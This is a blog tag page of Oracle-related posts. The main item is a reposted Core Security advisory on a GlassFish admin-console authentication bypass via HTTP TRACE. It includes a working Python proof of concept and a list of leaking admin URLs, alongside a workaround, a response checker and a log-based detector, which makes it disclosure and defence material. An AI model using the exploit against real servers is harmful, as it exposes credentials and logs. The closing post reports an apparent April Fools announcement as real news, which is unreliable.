Posts Tagged ‘oracle’

More Oracle patents ruled invalid in the fight with Android

Tuesday, July 5th, 2011

According to the official notes on the site: http://www.h-online.com/open/news/item/Another-problem-for-Oracle-s-patents-1273038.html

Oracle is not as strong as it looked in its lawsuit against Google: to Oracle's dismay, most of the patent dispute was recently cut down sharply. Oracle will be allowed to appeal, but for now it has already lost much of the force with which it started the case (fewer patents remain in play in the current proceedings).

See the full note:

Another problem for Oracle’s patents

The validity of another Oracle patent has become doubtful in the dispute with Google about the infringement of Java patents and copyrights on Android devices. The US Patent and Trademark Office (USPTO) has provisionally declared all 24 claims of patent number 6,125,447 as being invalid. The USPTO based its decision on a patent that had been used in another case. This patent was granted in 1994 – three years before Sun filed its Java patent application. The US patent office also considered two publications released in 1996 as evidence that Sun’s described method for protecting applications via “protection domains” was anticipated by “prior art.”

Oracle has taken Google to court over seven alleged Java patent infringements in the Android mobile operating system. The USPTO’s latest decision has temporarily invalidated five of them fully or in part. Oracle can still comment on the decision and may, if required, appeal against the patent invalidation.

Attorney Scott Daniels, who specialises in examining US patents, speculates that the USPTO’s decision may cause the lawsuit against Google to be postponed until all patents have been fully examined. This could also be in the interests of the presiding judge, who has already requested (PDF) that the original claims be reduced to a limited number of patent claims. Oracle has demanded that Google pay $2.6 billion in damages.

Oracle Linux 6.1

Thursday, June 2nd, 2011

Oracle Linux 6.1 has been released. To check the release notes:

[El-errata] Oracle Linux 6.1

Errata Announcements for Oracle Linux el-errata at oss.oracle.com
Tue May 31 16:49:49 PDT 2011


Oracle is pleased to announce the general availability of Oracle Linux
6.1 for x86 (32 bit) and x86_64 (64 bit) architectures.

Oracle Linux 6.1 ships with two sets of kernel packages:

       * Unbreakable Enterprise Kernel [kernel-uek-2.6.32-100.34.1.el6uek]
             o Installed and booted by default
       * Red Hat compatible Kernel [kernel-2.6.32-131.0.15.el6]
             o Installed by default

Oracle Linux 6.1 includes both a 32 bit and a 64 bit Unbreakable
Enterprise Kernel. By default, both the Unbreakable Enterprise Kernel
and the Red Hat Compatible Kernel are installed. The Unbreakable Enterprise
Kernel shipped in this update has the following driver updates:

Network Drivers updates

    * Updated tg3 to version 3.113.
    * Updated bnx2 driver and firmware to version 2.1.6
    * Added support for bnx2fc (version 1.0.2)
    * Updated bnx2x to version 1.62.00-6
    * Updated cnic to version 2.2.14
    * Updated bnx2i to version 2.6.2.3
    * Updated be2net to version 2.103.298r
    * Updated e100 to version 3.5.24-k2
    * Updated e1000e to version 1.2.20-k2
    * Updated ixgbe to version 3.2.10-NAPI
    * Updated igb to version 3.0.6-k2
    * Updated cxgb3 to version 1.1.4-ko
    * Added Chelsio T4(cxgb4) support (version 1.3.0-k0)
    * Updated bna to version 2.3.2.3r.
    * Updated igbvf to version 1.0.8-k0
    * Updated ixgbevf to version 1.0.19-k0
    * Updated qlge to version v1.00.00.27.00.00-01
    * Updated vxge to version 2.0.9-20840-k
    * Added qlcnic version 5.0.15.2
    * Updated enic to version 2.1.1.13
    * Updated netxen_nic to version 4.0.75

SCSI Drivers updates

    * Updated cxgb3i to version 2.0.0
    * Added cxgb4i (version 0.9.1)
    * Updated lpfc to version 0:8.3.5.30.1p
    * Updated megaraid_sas to version 00.00.05.34-rc1
    * Updated mpt2sas to version 08.101.00.00
    * Updated mptsas to version 3.04.18
    * Updated ipr to version 2.5.1
    * Updated fnic to version 1.5.0.1
    * Updated be2iscsi to version 2.103.298.0
    * Updated bfa to version 2.3.2.3
    * Updated hpsa to version 2.0.2-3
    * Updated cciss to version 3.6.28-RH
    * Updated qla4xxx to version v5.02.12.00.32.01-c0
    * Updated qla2xxx driver to version v8.03.07.03.32.1-k
    * Added Intel SCU driver version 1.0

Infiniband

    * Added QLogic IB support
    * Updated nes to 1.5.0.0

For more information, please refer to the online release notes available at:

http://oss.oracle.com/ol6/docs

Software Accessibility

All packages are available on the Unbreakable Linux Network
(http://linux.oracle.com).

Installable binary and source ISO images are available on eDelivery
(http://edelivery.oracle.com/linux).

If ISO images are needed before they are available on eDelivery, please request these via a My Oracle Support service request.

Thank you.

Sincerely,

The Oracle Linux Team

Downloads require registration.
Remember that Oracle Linux is a “rip” of Red Hat Linux.

BLOG: Oracle – one more bugfix for Your Excellency

Thursday, May 12th, 2011

In the hacking world nobody stands still, and below is another exploit for Oracle's GlassFish platform on Windows:

Oracle GlassFish Server Administration Console Authentication Bypass

1. Advisory Information
Title: Oracle GlassFish Server Administration Console Authentication Bypass
Advisory ID: CORE-2010-1118
Advisory URL: http://www.coresecurity.com/content/glassfish_admin_authentication_bypass
Date published: 2011-05-11
Date of last update: 2011-05-11
Vendors contacted: Oracle
Release mode: User release
2. Vulnerability Information
Class: Authentication Bypass Issues [CWE-592]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1511
3. Vulnerability Description
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.
4. Vulnerable packages
Oracle GlassFish Server 3.0.1
Sun GlassFish Enterprise Server 2.1.1
5. Non-vulnerable packages
Oracle GlassFish Server 3.1
Contact Oracle for patches for other GlassFish versions
6. Vendor Information, Solutions and Workarounds
Oracle notifies that GlassFish Server 3.1 was released in March 2011 and was fixed before release, so it is not affected. Oracle also notifies that patches for previous versions will be available in July, 2011. As a policy, Oracle does not provide workarounds unless they can be easily applied by every customer.
6.1. Workaround by Core Security
For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
In the GlassFish Admin Console, go to the Tasks tree.
Navigate through: Network Config > Protocols > admin-listener > HTTP.
There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
Finally, restart GlassFish by running C:\glassfishv3\bin>asadmin restart-domain
After following these steps, when executing the PoC included in this advisory, the webserver should respond:
405 TRACE method is not allowed headers = [('date', 'Thu, 28 Apr 2011 20:39:43 GMT'), ('content-length', '0'), ('connection', 'close'), ('allow', 'GET, HEAD, POST'), ('x-powered-by', 'Servlet/3.0')]
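The expected 405 reply above is the only confirmation the advisory gives that the workaround took effect. The following checker is an added example (not part of the Core Security advisory or this blog post) that classifies a server's reply to a TRACE probe of the admin console into the cases the advisory describes: a 405 whose Allow header lacks TRACE (workaround applied), a 2xx whose body merely echoes the request (the plain RFC 2616 section 9.8 behaviour), and a 2xx whose body is an HTML page (the page was served as if to an authenticated GET). The raw responses in SAMPLES are constructed; the first reproduces the header values of the 405 reply quoted above. The probe() function, which sends one TRACE to a listener you administer, is an assumption of this example and is not exercised offline.

```python
# Added example, not part of the Core Security advisory or the blog post: a
# checker that classifies a server's reply to a TRACE probe of the admin
# console, so the workaround in section 6.1 can be verified. Verdicts:
#   "hardened"      405 and TRACE absent from Allow   -> TRACE disabled
#   "rfc_echo"      2xx whose body echoes the request -> plain RFC 2616 s9.8 TRACE
#   "content_leak"  2xx whose body is HTML            -> page served as if to an
#                                                        authenticated GET
# The raw responses in SAMPLES are constructed; the first reproduces the header
# values of the 405 reply quoted in section 6.1.
import socket
from email.parser import BytesParser

SELECTOR = "/common/logViewer/logViewer.jsf"

SAMPLES = {
    "after_workaround": (
        b"HTTP/1.1 405 TRACE method is not allowed\r\n"
        b"Date: Thu, 28 Apr 2011 20:39:43 GMT\r\n"
        b"Content-Length: 0\r\n"
        b"Connection: close\r\n"
        b"Allow: GET, HEAD, POST\r\n"
        b"X-Powered-By: Servlet/3.0\r\n"
        b"\r\n"
    ),
    "rfc_trace": (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: message/http\r\n"
        b"\r\n"
        b"TRACE /common/logViewer/logViewer.jsf HTTP/1.1\r\n"
        b"Host: glassfish.example:4848\r\n"
    ),
    "leaking_page": (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: text/html;charset=UTF-8\r\n"
        b"\r\n"
        b"<!DOCTYPE html><html><head><title>Log Viewer</title></head>"
        b"<body>constructed placeholder for admin-console content</body></html>"
    ),
}


def parse_http_response(raw):
    """Split a raw HTTP/1.x response into (status, reason, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: no end-of-headers marker")
    status_line, _, header_block = head.partition(b"\r\n")
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        raise ValueError("malformed status line: %r" % status_line)
    status = int(parts[1])
    reason = parts[2].decode("latin-1") if len(parts) == 3 else ""
    # email's header parser handles folding and case-insensitive lookup for us
    headers = BytesParser().parsebytes(header_block + b"\r\n", headersonly=True)
    return status, reason, headers, body


def classify_trace_response(raw, selector=SELECTOR):
    """Map a raw reply to a TRACE request for `selector` onto a verdict string."""
    status, _reason, headers, body = parse_http_response(raw)
    allowed = {m.strip().upper() for m in headers.get("Allow", "").split(",") if m.strip()}
    if status == 405 and "TRACE" not in allowed:
        return "hardened"
    if 200 <= status < 300:
        # An RFC-compliant TRACE reflects the request line back as the body.
        if body.startswith(b"TRACE " + selector.encode("ascii")):
            return "rfc_echo"
        # A page body instead of a reflection is the behaviour the advisory describes.
        if b"<html" in body[:4096].lower():
            return "content_leak"
    return "unknown"


def probe(host, port, selector=SELECTOR, timeout=5.0):
    """Send one TRACE to a listener you administer and classify the reply (live check)."""
    request = ("TRACE %s HTTP/1.1\r\nHost: %s:%d\r\nConnection: close\r\n\r\n"
               % (selector, host, port)).encode("ascii")
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return classify_trace_response(b"".join(chunks), selector)


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print("%-16s -> %s" % (name, classify_trace_response(raw)))
```

Run it as-is to see the three constructed samples classified; after applying the workaround on your own installation, probe("127.0.0.1", 4848) should return "hardened". A 405 that still lists TRACE in Allow is reported as "unknown" on purpose, since it does not match the reply the advisory says to expect.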
7. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Security Technologies.
8. Technical Description / Proof of Concept Code
8.1. Introduction
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server [1] delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.
8.2. Authentication Bypass
[CVE-2011-1511] By default, when GlassFish Server starts, it runs an HTTP listener named admin-listener, associated with the __asadmin virtual server. This administrative server, which is accessed by the Administration Console, has the HTTP TRACE verb enabled by default. This can be configured from the Network Config > Protocols > admin-listener > HTTP tab.
By performing HTTP requests against the GlassFish Administration Console using the TRACE method, a remote, unauthenticated attacker can get access to the content of restricted pages in the Administration Console, because GlassFish Server will behave as if it were handling GET requests from authenticated users.
It is important to note that the response of GlassFish Server to a TRACE request includes the full content of the requested resource in the response body, as in a GET request; according to RFC 2616 (Hypertext Transfer Protocol -- HTTP/1.1), section 9.8 [2], the response SHOULD reflect the original request to the client in the response body.
The vulnerability described above allows attackers to access the content of the following pages without being authenticated:
Log Viewer: http://<GlassFish_IP>:4848/common/logViewer/logViewer.jsf
Information about the Java Virtual Machine installed on the server: http://<GlassFish_IP>:4848/common/appServer/jvmReport.jsf
Installed components: http://<GlassFish_IP>:4848/updateCenter/installed.jsf
Properties of an existing JDBC connection pool, including DB password: http://<GlassFish_IP>:4848/jdbc/jdbcConnectionPoolProperty.jsf?name=DerbyPool
The following Python code is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication:
# Usage: $ python poc.py <GlassFish_IP> <Administration_Port>
# E.g.:  $ python poc.py 192.168.0.1 4848
# (The advisory's original is Python 2 / httplib; this is the same code ported
#  to Python 3's http.client, with the line-wrapped string literals rejoined.)
import sys
import http.client


def make_trace_request(host, port, selector):
    """Send a TRACE request for `selector` and print the status, headers and body."""
    print('[*] TRACE request: %s' % selector)
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
        'Host': '%s:%s' % (host, port),
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-us,en;q=0.5',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
        'Referer': 'http://%s:%s%s' % (host, port, selector),
    }
    conn = http.client.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    body = response.read()      # read the body before closing the connection
    conn.close()
    print(response.status, response.reason)
    print(response.getheaders())
    print(body.decode('utf-8', 'replace'))


if len(sys.argv) != 3:
    print("Usage: $ python poc.py <GlassFish_IP> <GlassFish_Administration_Port>\n"
          "E.g.:  $ python poc.py 192.168.0.1 4848")
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
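Section 8.2 describes the request pattern (TRACE against the admin-console resources) rather than how to spot it after the fact. The following detector is an added example, not part of the advisory or of this blog post: it scans HTTP access-log lines for TRACE requests and rates those aimed at the admin-console paths the advisory lists (/common/, /updateCenter/, /jdbc/) as high severity, while a 405 outcome shows the workaround held. The NCSA common log format used for the lines is an assumption of this example (not GlassFish's documented default), and every line in SAMPLE_LOG is constructed.

```python
# Added example, not part of the advisory or the blog post: a log-side detector
# for the TRACE technique described in section 8.2. Assumptions: lines are in
# NCSA common log format (an assumption, not GlassFish's documented default),
# and all lines in SAMPLE_LOG are constructed for this example.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Admin-console path prefixes named in section 8.2 of the advisory.
SENSITIVE_PREFIXES = ("/common/", "/updateCenter/", "/jdbc/")

# Constructed sample lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - admin [11/May/2011:10:02:01 -0300] "GET /common/index.jsf HTTP/1.1" 200 5120
198.51.100.7 - - [11/May/2011:10:05:44 -0300] "TRACE /common/logViewer/logViewer.jsf HTTP/1.1" 200 18322
198.51.100.7 - - [11/May/2011:10:05:45 -0300] "TRACE /jdbc/jdbcConnectionPoolProperty.jsf?name=DerbyPool HTTP/1.1" 200 7410
203.0.113.9 - - [11/May/2011:10:07:12 -0300] "TRACE / HTTP/1.1" 405 0
192.0.2.10 - admin [11/May/2011:10:08:30 -0300] "POST /common/appServer/serverInstAppServer.jsf HTTP/1.1" 302 0
this line is not an access-log record
""".splitlines()


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_trace_requests(lines):
    """Return one finding per TRACE request, tagged with severity and outcome."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "TRACE":
            continue
        path = rec["path"].split("?", 1)[0]
        status = int(rec["status"])
        findings.append({
            "client": rec["client"],
            "path": path,
            "status": status,
            # 405 means the listener refused TRACE, i.e. the workaround held
            "outcome": "blocked" if status == 405 else "served",
            "severity": "high" if path.startswith(SENSITIVE_PREFIXES) else "medium",
        })
    return findings


def count_by_client(findings):
    """Number of TRACE requests per client, to prioritise which sources to review."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    found = find_trace_requests(SAMPLE_LOG)
    for f in found:
        print("%(severity)-6s %(client)-14s %(status)d %(outcome)-7s %(path)s" % f)
    print(dict(count_by_client(found)))
```

On the constructed sample the detector reports two high-severity TRACE requests from 198.51.100.7 that were served (200) against the Log Viewer and the JDBC pool property page, and one medium-severity TRACE from 203.0.113.9 that the listener refused with 405. Any served TRACE against the admin listener of a version listed in section 4 is worth treating as a probable read of restricted content.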
9. Report Timeline
2010-12-06: Initial notification sent to Oracle.
2010-12-07: Oracle replies that the bug has been forwarded to the product engineers, and requests Core to postpone the publication of the advisory.
2010-12-09: Core replies that the publication of the advisory can be postponed as long as Oracle provides a timeline for the release of fixes.
2010-12-20: Oracle confirms that it is a defect and it will be fixed in the development release. Oracle also replies that the fixes are planned to be released in April 2011.
2011-02-04: Core requests a status update on the fixes, and asks if Oracle can meet the April 2011 deadline.
2011-02-04: Oracle replies that the development version of GlassFish has already been fixed, and that the patches are being tested. They will update when all patches are tested and ready, still tracking an April 2011 release.
2011-02-17: Core informs that in that case the publication date will remain April 3rd.
2011-02-22: Oracle requests that the publication date is moved to April 19th, and informs that the patches are in progress and planned to be included in the upcoming Oracle's Critical Patch Update Security Advisory.
2011-02-24: Core replies acknowledging April 19th as the publication date.
2011-03-30: Core asks whether the GlassFish team is on track for an April 19th publication date.
2011-03-31: Oracle notifies that "patches would probably be ready to be released by April 19th. The bug affects multiple supported releases of the product with different fix schedules, and the GlassFish team is in various stages of the process."
2011-04-18: Core asks whether the GlassFish team is on track for an April 19th publication date.
2011-04-20: Oracle team notifies that in the previous email there was an unfortunate typo: when they wrote "It looks like patches would be ready to be released by April 19th", they meant "patches would not be ready... ". Oracle also requests to move the publication date to July 19th.
2011-04-25: Core notifies that this issue was reported on [2010-12-06] and (3 weeks ago [2011-03-31]) was confirmed to be released on Apr 19th. The typo Oracle mentioned changes the meaning of the last email altogether, while moving the release ahead for the end of July. Core communicates that no information was received about which specific versions of the software are vulnerable, and what are the specific workarounds or countermeasures that could be deployed in order to mitigate this vulnerability. Also, Core asks more details about Oracle's decision to postpone the release of fixes for 3 months. Specifically, Core wants to know if Oracle is intentionally delaying the release of patches to include them in the release of a new version of their product.
2011-04-25: Oracle notifies that:
This issue affects Sun GlassFish Enterprise Server 2.1.1 and Oracle GlassFish Server 3.0.1.
Oracle GlassFish Server 3.1 was released in March 2011 and was fixed before the release, so it is not affected.
The fix review, integration, test and release cycles run on predetermined schedules. Oracle is not delaying any fixes.
As a policy, Oracle does not provide workarounds unless they can be easily applied by every customer.
Fixes have been integrated; all the final patches should be available in July.
2011-05-05: Core decides to release the advisory next Wednesday, May 11th; and notifies the sequence of events that has motivated that decision:
Oracle was notified of the vulnerability 5 month ago.
Oracle released a fixed version of GlassFish (March 2011) without notifying Core, without patching previous versions and without publishing any workaround for affected users.
Core has a workaround that mitigates the vulnerability.
Core sends the proposed workaround [Sec. 6.1] to the Oracle Team and asks if they want to add further information in the advisory.
2011-05-06: Oracle requests Core to hold the advisory publication until they have patches available for all customers. Oracle states that they announce security fixes on a pre-determined schedule, so users are prepared to apply them. Adhoc publication of issues may not allow every customer to monitor and apply patches in time, which increases their exposure.
2011-05-09: Core notifies that the publication of security advisories is aimed at explaining the problem to the vulnerable user community and providing the technical details and guidance so they can devise protection countermeasures. Core usually releases this information in coordination with the vendor, but in this case this is not possible because Oracle has already released patches for some versions (without notifying Core). Currently, there is a patched version of GlassFish and there are vulnerable versions with exposed users. In this scenario, Core has decided to release the advisory as 'user release' next Wednesday, providing a way to mitigate the problem until patches are available. The vendor (Oracle in this case) may or may not agree with Core's assessment on how to help users to reduce risk, but the vendor is certainly not the only party entitled to provide plausible solutions to the problem.
2011-05-11: Advisory CORE-2010-1118 is published.
10. References
[1] http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html
[2] http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
11. About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
12. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
13. Disclaimer
The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. PGP/GPG Keys

This advisory has been signed with the GPG key of the Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

SOURCE: http://www.exploit-db.com/exploits/17276/

Oracle releases OpenOffice to the Community

Sunday, April 17th, 2011

Oracle Announces Its Intention to Move OpenOffice.org to a Community-Based Project

REDWOOD SHORES, CA–(Marketwire – April 15, 2011) – Oracle Corporation (NASDAQ: ORCL) today is announcing its intention to move OpenOffice.org to a purely community-based open source project and to no longer offer a commercial version of Open Office.

“Given the breadth of interest in free personal productivity applications and the rapid evolution of personal computing technologies, we believe the OpenOffice.org project would be best managed by an organization focused on serving that broad constituency on a non-commercial basis,” said Edward Screven, Oracle’s Chief Corporate Architect. “We intend to begin working immediately with community members to further the continued success of Open Office. Oracle will continue to strongly support the adoption of open standards-based document formats, such as the Open Document Format (ODF).”

Oracle has a long history of investing in the development and support of open source products. We will continue to make large investments in open source technologies that are strategic to our customers including Linux and MySQL. Oracle is focused on Linux and MySQL because both of these products have won broad based adoption among commercial and government customers.

Folks, I am very HAPPY and now fully believe this project will take off, especially because what Oracle wanted with the purchase of Sun, besides killing MySQL, was to kill everything that came along with the Sun purchase (with some exceptions, namely JAVA). For me the kick-off was discontinuing OpenSolaris; then there is the matter of the MySQL project being “stuck” in time… after all, who would be “crazy” enough to develop a tool that is one of the main competitors of their own flagship product, and FREE on top of that, and so on….. It really changes one's view of the project… the community is certainly the most suitable steward for such a large project.

Hugs to all. :D

Source

To my heart's sorrow: Apache will be sold

Thursday, April 1st, 2010

Gentlemen, to my utter sorrow, Apache will be sold.
What will become of the lovers of this project?

see:

http://blogs.apache.org/foundation/date/20100401